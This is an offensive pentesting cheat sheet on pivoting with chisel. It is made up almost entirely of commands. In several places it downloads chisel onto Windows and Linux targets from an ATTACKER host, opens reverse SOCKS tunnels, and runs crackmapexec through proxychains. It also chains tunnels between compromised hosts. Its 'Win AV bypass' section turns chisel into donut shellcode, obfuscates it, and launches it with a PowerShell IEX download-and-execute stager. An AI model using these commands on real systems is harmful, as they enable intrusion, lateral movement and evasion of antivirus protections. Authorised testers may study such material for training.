Chiselο
Chisel Instanceο
I use only one instance to manage multiple proxy endpoints.
(replace bla:bla with other random creds if you want to)
docker run --name chisel --rm -d -p0.0.0.0:443:80 jpillora/chisel server --socks5 --reverse -v --auth bla:bla --port 80
docker inspect --format '{{ .NetworkSettings.IPAddress }}' chisel # Get container ip, probably 172.17.0.2
docker logs chisel -f # Stream logs
Target as Socks5ο
Upload chisel on target, and link it to chisel server.
Donβt forget to set credentials if you replaced them in the first place.
POWERSHELL
(New-Object System.Net.WebClient).DownloadFile("http://ATTACKER/chisel.exe", "$env:TEMP\chisel.exe")
Start-Process -NoNewWindow -FilePath "$env:TEMP\chisel.exe" -ArgumentList "client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks"
CMD ALTERNATIVE
START "" "/users/user/chisel.exe" client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks
# If you need to kill all chisel processes ...
# taskkill /F /IM chisel.exe
Linux
wget http://ATTACKER/chisel -O /tmp/chisel;chmod 755 /tmp/chisel
/tmp/chisel client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks &
Great, our chisel container now listen on port 5000 as socks5 !
Here is an example about how to use it with proxychains
echo -e '[ProxyList]\nsocks5 172.17.0.2 5000'>/tmp/TARGET1
proxychains -q -f /tmp/TARGET1 crackmapexec smb TARGET_NETWORK
Target as Listenerο
You want the target to listen on a port and forward the traffic back to you ?
Letβs say you want to chain multiple chisel
TARGET2 => TARGET1:7777 => ATTACKER:443
BASH
# Target1
chisel client -v --auth bla:bla ATTACKER:443 TARGET1IP:7777:ATTACKER:443 &
# Target2 (socks5)
chisel client -v --auth bla:bla TARGET1IP:7777 R:0.0.0.0:6000:socks &
# Attacker
echo -e '[ProxyList]\nsocks5 172.17.0.2 6000'>/tmp/TARGET2
proxychains -q -f /tmp/TARGET2 crackmapexec smb TARGET2_NETWORK
Win AV bypassο
(You need the loadsc script https://offensive.run/winecosystem/lpe/README.html#av-bypass)
LHOST="192.168.45.216"
LPORT=443
PARAMS="client -v --auth bla:bla $LHOST:$LPORT R:0.0.0.0:5000:socks"
INPUT_FILE='/var/www/html/chisel.exe'
SHELLCODE_OUTPUT_FILE='/tmp/chiselsc'
ENCODED_PAYLOAD_FILE='/var/www/html/chiselsc'
python3 -c "import donut; donut.create(thread=0,compress=2,bypass=1,exit_opt=3,arch=2,file='$INPUT_FILE',output='$SHELLCODE_OUTPUT_FILE',params=bytes.fromhex('$( echo -en "$PARAMS" | xxd -plain | tr -d '\n' )').decode('utf-8'))"
cat "$SHELLCODE_OUTPUT_FILE" | xxd -plain | tr -d '\n' | rev | gzip | sudo tee "$ENCODED_PAYLOAD_FILE" >/dev/null
cat <<'EOF'|sudo tee /var/www/html/startchisel
$loadsc="$web/loadsc"; $sc="$web/chiselsc"; $python="$web/python.zip"; $dir="$env:TEMP";
$Exists = Test-Path "$dir\python\";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,"$dir\python.zip");Add-Type -assembly "system.io.compression.filesystem";[io.compression.zipfile]::ExtractToDirectory("$dir\python.zip", "$dir\python\")};
$arguments = @("-c","""import urllib.request as r;exec(bytes.fromhex(r.urlopen('$loadsc').read()[::-1].decode('utf-8')));load('$sc')""")
Start-Process -NoNewWindow -FilePath "$dir\python\python.exe" -ArgumentList $arguments
EOF
Then call chisel
$web="http://192.168.45.216";IEX(New-Object Net.WebClient).downloadString("$web/startchisel")